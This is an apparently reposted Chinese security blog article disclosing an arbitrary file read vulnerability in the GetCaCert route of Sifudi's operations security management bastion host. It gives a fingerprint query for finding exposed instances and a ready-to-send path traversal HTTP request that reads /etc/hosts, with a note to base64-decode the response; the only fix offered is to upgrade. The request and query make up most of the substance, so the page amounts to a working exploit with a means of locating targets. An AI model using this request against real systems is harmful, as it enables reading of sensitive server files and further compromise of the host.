当前位置: 首页 > news >正文

思福迪运维安全管理系统 任意文件读取漏洞

news 2025/9/12 11:44:42

产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机

漏洞概述

由于思福迪运维安全管理系统 GetCaCert路由存在任意文件读取漏洞,攻击者可通过该漏洞在服务器端读取任意文件敏感内容,可能导致攻击者后续获取到相关的服务器权限

资产测绘

banner=“Set-Cookie: bhost=” || header=“Set-Cookie: bhost=”

漏洞复现

GET /bhost/GetCaCert?a1=../../../../../etc/hosts HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

在这里插入图片描述
base64解码,获取明文内容:
在这里插入图片描述

整改建议

升级至安全版本

http://www.lryc.cn/news/269456.html

相关文章:

  • OCR在审核应用落地
  • 借贷协议 Tonka Finance:铭文资产流动性的新破局者
  • Python+Yolov5+Qt交通标志特征识别窗体界面相片视频摄像头
  • 浅谈高并发以及三大利器:缓存、限流和降级
  • 深入ArkUI:深入实战组件text和text input
  • WPF 基础(Binding 二)
  • 限制el-upload组件的上传文件大小
  • 什么是爬虫,为什么爬虫会导致服务器负载跑满
  • 线上隐私保护的未来:分布式身份DID的潜力
  • 服务器被入侵后如何查询连接IP以及防护措施
  • 【开源】基于Vue+SpringBoot的公司货物订单管理系统
  • 2023-12-29 服务器开发-Centos部署LNMP环境
  • CEC2017(Python):五种算法(DE、RFO、OOA、PSO、GWO)求解CEC2017
  • 数字身份验证:跨境电商如何应对账户安全挑战?
  • Nature | 大型语言模型(LLM)能够发现和产生新知识吗?
  • C# 使用ZXing.Net生成二维码和条码
  • Windows系统配置pytorch环境,Jupyter notebook编辑器安装使用(深度学习本地篇)
  • 详解“量子极限下运行的光学神经网络”——相干伊辛机
  • uniapp通过蓝牙传输数据 (安卓)
  • LT8612UX-HDMI2.0 to HDMI2.0 and VGA Converter with Audio,支持三通道视频DAC
  • python gui programming cook,python gui视频教程
  • 亚马逊bsr排名的影响因素,如何提高BSR排名?-站斧浏览器
  • K8s-安全机制
  • GPT-3: Language Models are Few-Shot Learners
  • Qt Quick 用cmake怎么玩子项目
  • 大数据学习(29)-Spark Shuffle
  • archiver error. Connect internal only, until freed.
  • 鸿蒙HarmonyOS-图表应用
  • elasticsearch 笔记三:查询建议介绍、Suggester、自动完成
  • 【hyperledger-fabric】将智能合约部署到通道